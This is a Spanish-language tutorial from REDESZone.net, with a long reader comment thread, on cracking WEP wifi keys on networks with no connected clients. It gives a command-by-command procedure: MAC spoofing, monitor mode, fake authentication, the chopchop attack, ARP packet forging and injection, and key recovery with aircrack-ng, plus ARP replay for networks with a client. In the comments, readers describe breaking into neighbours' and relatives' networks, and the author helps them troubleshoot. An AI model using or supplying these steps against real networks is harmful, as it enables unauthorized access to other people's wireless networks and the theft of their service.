Este manual está orientado para generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi), (si no hay clientes no hay tráfico), es un ataque que una vez hecho genera mucho tráfico, pero no siempre funciona con todas las redes wifis.
Una vez aclarado ésto podemos empezar (he utilizado Wifiway 1.0 Final) .
Lo podéis descargar de aquí:
Descarga Wifiway 1.0 Final Gratis
El MD5 de este archivo es: 2fac135cad7b185706bbcb9c51f45932 COMPROBADLO!!
Cambiar la MAC de nuestra tarjeta wireless:
Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0
Ponemos la tarjeta en modo monitor para poder coger los paquetes
Como en el anterior manual dijimos…
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Abrimos airodump para apuntar canal, bssid y el ssid
Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.
Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.
Nos asociamos a la red wifi (Asociación Falsa)
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Lanzamos el ataque chop chop
Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.
No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos…
Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí. Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.
Fabricar paquete ARP para inyectarlo
Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete
Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete wlan0
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema.
Esperar a que haya suficientes IVs
Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta un número decente.
Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave la podrá sacar aircrack).
Ejecutamos Aircrack-ng para conseguir la clave
Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:
aircrack-ng captura-01.cap
Tenéis que poner el nombre de la captura que habéis puesto anteriormente en el airodump, si no os acordáis o habéis cerrado, iros a /root y ahí veréis el archivo .cap, tomáis nota de su nombre y lo ponéis.
En pocos minutos tendréis la clave.
Fijaos la diferencia de IVs y el corto espacio de tiempo, en 8 minutos, hemos captado más de 250.000 IVs.
Cuando HAY clientes conectados No-Chop-chop
Si la red wifi tiene un cliente asociado lo mejor es hacer la re-inyección de paquetes ARP, es igual que el chop-chop pero no hay que trabajarlo tanto para forjar el paquete etc.
Re-inyección de paquetes ARP:
aireplay-ng -3 -b BSSID -h MAC DEL CLIENTE ASOCIADO [interfaz]
Ejemplo:
aireplay-ng -3 -b 00:02:CF:69:69 -h 00:02:CE:11:11 wlan0
No tiene por qué ser instantáneo, esperad un poco, unos 4 o 5 minutos sería más que suficiente, os digo lo mismo que antes, algunas veces este tipo de ataques no funcionan con determinados puntos de acceso o redes wifi.
Últimos comentarios sobre este manual
Suerte con este método para conseguir tráfico, ya que a veces no sale a la primera, y ni tan siquiera siempre sale…depende del punto de acceso.
Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable), esperad hasta llegar a un millón y medio y lo hará (y si no sale, ponlo en el foro a ver qué está pasando).
Con esto terminamos la auditoría wireless con cifrado WEP, espero que os haya sido útil, y sobre todo, que os hayáis divertido tanto como nosotros.
Manual realizado por Sergio de Luz (Bron) para REDESZone.net
chinchetaaaaa!
en ves de
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
no sera
aireplay-ng -4 -a (mac del ap) -h MAC QUE TENEMOS (FALSA) [interfaz]
Hola!
No, mira la captura de pantalla como funciona correctamente
vale gracias
es raro por que con cliente conenctado pude sacar la clave ahora no puedo 
que sera??
con todo esto de la navidad y año nuevo no habia teniado tiempo de entrar ahora lo probe nuevamente y el ataque chop chopme falla al igual que el de fragmentacion
eso me pasa a mi la primera vez funciono de lujo con alguien conectado luego me a sido imposible inyectar aunq ubiera alguien conectado (lo intente por lo menos tre o cuatro veces) y logo llego a mi casa y funciona de lo lindo no se.. probare con este tutorial ..
A mi me funciona, yo lo hacia con una pequeña variante, pero me tardaba unos 5 minutos o mas en inyectar, intente con esto y siempre he podido sacar las contraseñas aun sin clientes conectados, quiza la red que intentan sacar tiene filtro MAC, necesita una variante extra para eso.
Realtek RTL8191SE Wireless LAN 802.11n PCI-E NIC
es es la tarjeta q tengo, hay algun programa q pueda usar? o debo conseguir un adptador usb¡? es que utilice el back track 3 y no me sale nada cuando coloco airmon-ng ….¡?
Prueba con el nuevo WIFIWAY 2.0.1 FINAL a ver si tiene los drivers
Bueno, sinceramente decirte que eres EPA (El P**** AMO) mejor tutorial que este no se ha escrito, con capturas, ejemplos… vamos que me he quedado sin palabras, pero con 200.000 IV’s en 7 minutos
Yo quería preguntar que comandos se pueden utilizar cuando no se puede uno asociar, que no siempre se puede hacer, he leido que por lo visto hay que utilizar en esos casos otro tipo de ataque simultaneo al chop-chop, creo que seria interesante ponerse en esa situacion y si podeis o sabeis decir otra alternativa.
Hola,soi un poco novato en este tema y me pasa lo siguiente:
no soi capaz de pasar del primer paso.
yo uso el wifiway 2.0.1 final.y al intentar poner la MAC falsa me sale este error:
wifiway ~ # macchanger -m 00:01:02:03:04:06 wlan0
Current MAC: 00:16:ea:53:19:b2 (unknown)
ERROR: Can’t change MAC: interface up or not permission: Device or resource busy
gracias de antemano y un saludo.
interface up or not permission
Significa que la estas usando, que estás con el airodump o que ya la tienes en modo monitor…este paso hazlo el primero
Si sigue sin ir, ponle un SUDO SU delante para loguearte como ROOT.
Hola!!
Muchas gracias por el aporte. Nunca he escrito pero estoy haciendolo suiguiendo tus instrucciones y no me permite cambiar MAC. Primero me decia lo mismo que a Josele, y tampoco me sirve poner sudo su delante, me dice que no encuentra el comando sudo.
No quiero seguir sin poder cambiarlo… podrias ayudarme?
Gracias por todo!!
Qué fallo te pone? muy raro que no te deje, asegúrate de hacerlo antes de ponerlo en modo monitor.
En el paso de “Lanzamos el ataque chop chop”, ¿es normal que tarde mucho tiempo en aparecer lo del Y o que aparecan de otros BSSIDs?, espero vuestra respuesta, gracias =)
Depende de la sensibilidad de tu tarjeta…no suele tardar mucho.
Gracias, parece que puede tardar un poco, al final lo realize con el Wifiway y el airoscript y me funciono sin ningun problema, pero tus pasos estan a la perfeccion sin usar el script, gracias y mas gracias =)
hola sergio para empezar muy bueno el tutoria, mira hace unos dias recien descubri el chop chop (antes hacia A1+A3), y trabajo con backtrack 4 y luego de iniciar el chop chop y poner “y” he estado como 20 minutos y me aparecia hasta el 15% pero la #data subia unos 100 #data por minuto y luego muevo el mouse y la pantalla se pone negra y tengo que reiniciar, si sabes que puede estar pasano por favor ayudame gracias de antemano
Es que yo no he probado nunca backtrack, siempre Wifiway o wifislax, tiene toda la pinta de fallo del sistema…prueba con estas otras distribuciones de seguridad como te digo
hola gracias por responder si justo he estado tratando de nuevo y voy a probar con wifiway que tambien lo tengo. Aca te va otra pregunta luego de 30 minutos esperando a que me salgan los archivos .cap y .xor me comenzo a salir que no habia espacio en el disco y en ese caso como podria hacer? (si es que me sale eso en el wifiway?), bueno gracias de antemano.
Jamás me ha pasado eso con wifiway, no creo que te pase
Haber si alguien me puede contestar la duda… hay un router wifi con seguridad wep y sin cliente que no puedo hackear cuando me llega aproximadamente un 50% de señal e probado con otros pero si que puedo solo este se me resiste
Como lo soluciono?
Hay routers que son muy puñeteros y no sueltan ninguna data…sólo te queda seguir intentándolo por este método.
Yo utilizo Ubuntu y no tengo problemas.
A mi me aparece este error cuando kiero conectarm al router:
00:12:58 Waiting for beacon frame (BSSID: 00:97:63:DF:12:0C) on channel -1
00:12:58 mon0 is on channel -1, but the AP uses channel 6
Eso es porque en el airodump-ng debes FIJAR un canal para escuchar, no vale escuchar en todos
El comando lo tienes en el propio manual.
Seguid el manual al pie de la letra
OK brother, gracias por tu pronta respuesta…..:)
Hola, primero que buen tuto, segundo en el paso de que trato de tomar el paquete para poder hacer el ARP forjado no puedo lograrlo, me sale con que estoy lejos o el router no soporta inyeccion de paquetes, una vez ya lo habia logrado pero esa vez creo k si tenia un cliente…. que puedo hacer uso backtrack 4 me recomiendas cambiar de sistema o cambiar de modo de ataque?
salu2
Usa WiFiway 2.0.2 que ese es el que tengo yo.
HOLA TENGO UNAS CNSULTA UNA VES IA OBTENIDO LA CLAVE WEP DE LA RED VICTI MA AHORA COMO PODRIA SABER CON Q IIP ESTA TRABAJANDO ESTA RED IA Q EN EL COMANDO AIRCRACK.NG*.CAP ME SALE LA LISTA EN ALGUNOS CASOS CUANDO DON SEÑALES LIBRES O SIN CLAVE SE LES VE EL IP PERO CUANDO SON WEP SALE LA CANTIDAD DE IVS OBTENIDOS HASTA EL MOENTO MAS NO LOS IPS CON LA Q TRABAJA LA RED
DE LA CUAL UNO OBT IENE LA CLAVE Y COMO HARIA PARA SABERLO Y ES COMO PODRIA PROBARLO ESTANDO EN BLACK TRACK OSEA COMO CONCECTARME A ESA RED DE Q FORMA GRAXIAS DE ANTE MANO
Tengo un problema, cuando realizo el ataque Chop-Chop y me pregunta Use this packet? comparo la BSSID y no corresponde a la que estoy atacando y no se como lograr que inyecte a la señal que indique en los pasos anteriores.
de toodas maners puse (y) cuando me pregunto use this packet? y nada.
Repeti el ataque y me cambio la BSSID pero por otra que tampoco corresponde y el mismo problema
Dale a NO hasta que coincida…si no tiene ninguno es que no ha podido coger nada y debes seguir intentántolo.
hola yo pongo los ocmandos bien pero cuando llego a donde se escoje la red wifi no aparece ninguna quisiera saber si es por el chipset o procesaor pues nunca me sale ninguna red .. se queda procesando ñlos canales y lo sminutos corren y nunca sale ninguna red
La tarjeta inalámbrica no será compatible…qué modelo es?
hola muchachos como estas mi correo es **@hotmail.com estoy intentando con el backtrack y pues cuando le doy el comando de buscar las redes y despues darle control c , nunca me aparece ninguna red quisiera saber por que es si es por el chipset procesador del computador que estoy utilizando , se queda en esa parte y pasa los 5 minutos y no me detecta ninguna red espero sus respuesta amigos
EXCELENTE TUTORIAL, SE AGRADECE MUCHISIMO ! LO PROBARE CON UNOS AP QUE NO EH PODIDO HACKEAR DEBIDO A QUE NO HAY CLIENTES, YA LES COMENTARE COMO ME FUE, SALUDOS
y como optienen las ip de de las redes hackeadas
El DHCP del router se encarga de ello si lo tienes habilitado.
hola cuando utilizo airmon-ng start wlan0 no me aparece ninguna interfaz, pero cunado hago iwconfig si me aparece la interfaz, no se xq es pero no puedo poner la tarjeta de red en modo monitor, alguien me puede ayudar, dejo un tema en taringa en donde explico mejor mi situacion con imagenes y todo
http://www.taringa.net/comunidades/crakers/3694025/Problema-Xplico-en-blacktrack-5.html
Manden un mail si me pueden ayudar **
Haciendo iwconfig pillas la interfaz, y luego con el airmon la pones en modo monitor si se puede. Usa “sudo” delante para iniciar como admin en caso de que no lo estés.
Sergio sigo tu manual al pie de la letra y me va todo bien hasta el ataque CHOP CHOP que me dice the atack is failed cuando esta creando el archivo CAP ¿Puedes ayudarme? Utilizo Wifiway 2.0.2 y mi targeta es una atheros 5007 , Me he alejado de la señal e provado con otras mas lejanas pero nada hasta ahi me quedo , es por driver? debo provar con el BACKTRACK??
Prueba la ultima version de wifiway, la 2.0.3
Buen aporte eres lo maximo man
Hola
cuando estoy fabricando el paquete para inyectarlo me pide:
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
El nombre del paquete y no sse cual es
Gracias.
El que tu quieras:
-w paquete1
Por ejemplo, es porque luego lo inyectas con aireplay.
holaaa
Mira tengo 2 preguntas:
*cuando lanzo el ataque chop-chop aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz] le doy “y” ya que coincide el bssid pero mes sale:
failure: got several deauthentication packets from the ap – try running another aireplay-ng with attack “-1″ (fake open – system authentication).
*Cual es el rango de la ip si la del router es 192.168.0.1
gracias…
Mientras hacías eso estabas haciendo el ataque de deauth?
Puedes poner 192.168.0.50 por ejemplo
Si, luego lo copie y lo pegue varias veces y avanzaba hasta un 14% y lo mismo
muy bien este tutorial me sirvio .mucho gracias…. me salio a la primera saludos
hola, disculpa, intente hacer el ‘hackeo’ a la red de mi hermana, tiene cifrado wpa-psk, y al lanzar el atake
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
no me da acceso, ni nada, se queda mandando los paquetes, y me dice k no es posible, devido a ciertas razon, espero pronto tener la oportunidad de intentarlo otra vez, para postear la captura de pantalla, ya que en la de mi casa si me dejo accesar, aclaro estube usando el wifiway, tal cual lo describes.
Yo, al igual que crons también tengo problemas al obtener las IP de las redes hackeadas. El caso es que consigo descifrar las pasword pero como no tengo ninguna ip asociada, no puedo conectarme. Alguien podria ayudarme con el tema de las IP. Gracias de antemano.
Si tienes la clave, basta con conectarte y ya porque por defecto tienen activado el DHCP SIEMPRE.
a la hora de aplicar el interfaz en , no me sale wlan0 ni wlan1, para poner la antena en modo monitor, ¿sabe alguien si es cosa de mi antena wifi o de la versión de wifiway 2.0.2.?
Pon IWCONFIG
A ver qué nombre tiene…
yo crackeo una red sin clientes en tres sencillos pasos y sin necesidad de escribir comandos,no esta mal esplicado es mas muy bien.yo hantes hacia halgo parecido en bactrack.pero hay mejores formas mas raspidas para no quemarte ahi en tiempo y paciencia.sinplemente tienen que utilizar airoscript-ng nuevo
¿puedes decir como?
Los Programas y todo de Linux es lo maximo mas que microsoft windows
No me funciona, cuando pongo el comando “# aireplay-ng -4 -h MAC FALSA [INTERFACE]”
me da el paquete .CAP pero no me da el .XOR, dice al final que el ataque chopchop fallo (claro esta que en ingles) y me da varias opciones por lo cual pudo haber fallado, que puedo hacer, uso wifiway 2.0.3 fina.
a mi no me reconoce mi tarjeta de wireless
ya pude!! lo que pasa es que mi tarjeta de red no puede inyectar, pero con la de mi hermano una realtek8187 no tuve problemas aunque lo ise con el wifiway 2.0.3 y en pasos un poco mas sencillos tu aporte me sirvio como una gran guía de que se devia hacer, gracias!!
*Al principio dices que hay que cambiar la MAC de la tarjeta y luego dices que es una MAC falsa, entonces, ¿al cambiar la MAC realmente la cambia?, y si es así ¿luego puedo volver a la anterior MAC?.
* que es IP del RANGO? y ¿como lo consigo?
Sip, cambias la MAC real por una inventada = MAC Falsa. Sí, realmente cambia la MAC vía software. Volverá a tener la misma MAC una vez reiniciado el ordenador.
Si la IP del router es 192.168.1.1, y teniendo en cuenta que la maścara de subred siempre es 255.255.255.0 el rango iría desde: 192.168.1.2 a 192.168.1.253
Creo que muchos igual que yo tuvieron o tienen el problema de que no se les creo el paquete .xor CREO (notese que lo puse en mayúsculas) es por el chipset de la tarjeta de red que usan, en el ejemplo que colocan y si ven la imagen es una realtek 8187 el chipset es rtl8187, yo batalle y jamas de los jamases pude con mi atheros AR9285, todo me iba bien, de lo mejor asta llegar a ese paso y sin importar que hiciera jamas saque el paquete, ahora, yo tenia una antena wifi externa la cual le vendí a mi hermano (realtek 8187, sobra decir el chipset pero por si acaso rtl 8781), se la pedi prestada unicamente para ver si ese era el problema y lo consegui, unicamente que lo ise con wifiway 2.0.3 y en pasos mas sencillos (pero igual si hacen los pasos que les dan en el ejemplo lo lograran, al fin que el proceso es el mismo), solo que como lo ice yo fue sin tanto comando no abrir tanta terminal, pero finalmente pude inyectar, ahora me queda una duda gigante, porque puedo con otras redes, la gran mayoria, exepto mi modem, sera porque es un modem y esta conectado a un router, quiero aclarar que soy novato y no se mucho de esto, pero, sigo sin poder con mi modem, a pesar que hago lo mismo que con otras y nomas no puedo, yo no compre el router, así me conectaron el internet y aunque e revisado las configuraciones del router no hay nada sospechoso, mmm ¿que pudiera ser?, lo que pudiera ser bueno es que es casi imposible que lo hackeen y me roben el internet, aunque no faltara el que sepa mucho mas y lo logre
hola disculpa pero de esa forma tambien trabaja en windows xq yo tengo es windows xp pero no se como hacerlo con ese programa ya que no me aparece nada de lo que dices para windows.. por el comando ejecutar lo puedo hacer espero tu respuesta gracias de ante mano.. tremendo tutorial
El manual está hecho para WifiWay o WifiSlax, nunca lo he intentado en Windows
Hola. Buen tutorial pero me sale lo mismo que a varios…
“Failure: got several deauthentication packets from the AP – try running another aireplay-ng with attack “-1″ (fake open-system authentication)” Que puede ser ?
hey, tengo el mismo problema de ZeyKar, ya hice todo al pie de la letra pero siempre me sale
Waiting for beacon frame (BSSID: xxxxxx) on chanel -1
mon0 is on channel -1, but the AP uses channel 9.
no se si tiene algo que ver la tarjeta ya que cuando la mando a modo monitor me sale una tarjeta
“virtual” mon0, obviamente yo le cambio la MAC a mon0 y no a Wlan0 y sigo todo el tutorial hasta el problema arriba mencionado.
cuando hago lo de “airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]”
me sale “channel 9 [elapsed: x mins] [fecha] [fixed channnel mon0: -1]”
lo de fixed channel mon0 : -1,en las capturas no sale. sera ese sea el problema?
asi que ojala pudas ayudarme
consigo todo los pasos pero solo me deja llegar a 250 000 ivs y luego fallo de ” fwrite failed ” espacio insuficiente.
Que hacer ? Uso vmware y wifiway 1 final
Hola me podías decir q se de poner en el apartado nombre captura? Cual es la captura? Lo siento soy novato muchas gracias un saludo.
El nombre del archivo de salida… El que quieras
Perdoname pero no se cual el nombre de del archivo de salida? Ni idea ponme un ejemplo por favor soy un zoquete muchísimas gracias
Tienes puesto un ejemplo…
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Este manual sirve para claves wpa tkip? Con lo de archivo de salida te refieres a darle nombre a una carpeta para q meta los archivos q va crear? Graciasss
No, no sirve, solo WEP.
Sin un cliente asociado mas que tu solo ( previamente realizado con el ataque de falsa autenticacion) es mas efectivo usando el ataque -4 que haciendo solamente el ataque -3 o -2?
Hola Sergio ,puedo hacerlo y para windows xp en un ordenador hp para redes wlan?gracias
Estoy muy agracecido. es un excelente y muy completo tutorial, hasta este momento no habia encontrado la manera de generar #Data sin clientes conectados.
Lo aplique modificando algunas cosas y es sorprendente la velocidad con la que genera #Data.
Gracias Funciona al 100%
yo no puedo pasar del primer paso yo escribo
macchanger -m 00:11:22:33:44:55 wlan0
y no me funciona me dice esto current MAC: 00:19:7e:66:7a:51 (unknown)
ERROR: can`t change MAC: interface up or not permission: Device or resurce busy
Estás usando esa tarjeta o no lo haces con permisos de root.
Hola,
No puedo para de fijarme que en el momento que atacabas al AP, hay un 50% de posibilidades de tuviese un cliente un cliente conectado, solo hay 2 puntos de acceso que empiezan por: 00:1A: y solo el tuyo recibe datas así que creo que había un cliente en el momento del ataque.
yo tengo un adaptador KOZUMI K-500MWUN es compatible con este programa porque con el backtrack4 no es compatible
“Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable)” ????????
Parece que no has tienes mucha practica:
- Para clave de 5 digitos necesitas solamente un aproximado de 20 000
- Para clave de 13 digitos necesitas mas o menos 50 000
Probado con Wifiway 2.0.1
Saludos.
Y de 26 dígitos la clave qué?
hola no pude asociarme con el ap de la red pero esperando un poco mas pude sacar la clave ahora cuando quiero conectarme para navegar me aparece el google pero no puedo navegar, haciendo en cmd un ipconfig /all para ver la ip que me asigno y la puerta de enlace del moden que me quiero colgar no sale nada , cual seria la forma de saber la ip del moden si ya se tiene la clave , me parece que el moden esta con el dhcp desaptivado o puede ser que mi vecino tambien le echo letra a filtracion mac del moden .. hay unamnera de saber la ip del moden
hola sergio de luz
me podrias decir si hay algun video con los pasos que as hecho tu ?
hola solo t recomiendo aserlo como bideo es mas fasil
se puede resetear un ap sin estar fisicamente serca de el osea con software y sin tener que utilizar el boton de reset que traen los ap
por que me sale todo pero siempre tengo problemas con el archibo.xor me sale el archibo cap pero no el .xor tengo barios programas pero siempre cuando le aprieto la (y) todo estabien pero no me sale el archibo .xor y dise los problema por el cual no se puede aser la operacion plis ayudenme es que me inporta mucho si me ayudan se los agradesco
Hay procesos mas cortos y mas efectivos explicados en video en YouTube… Googlenlo.
Hola estoy leyendo sus comentarios pero no logro entener como hacer porque corro el aireplay-n y me aparece la pantalla pero al segundo se me borra y no me djea ver nada, tambien me ha pasado que el sistema pide que instale el JAVA, (no cual es) yo tengo XP instaldao me podrias ayudar con algun tutorial donde pueda ver paso a paso como hacer, Grasica y Saludos a todos.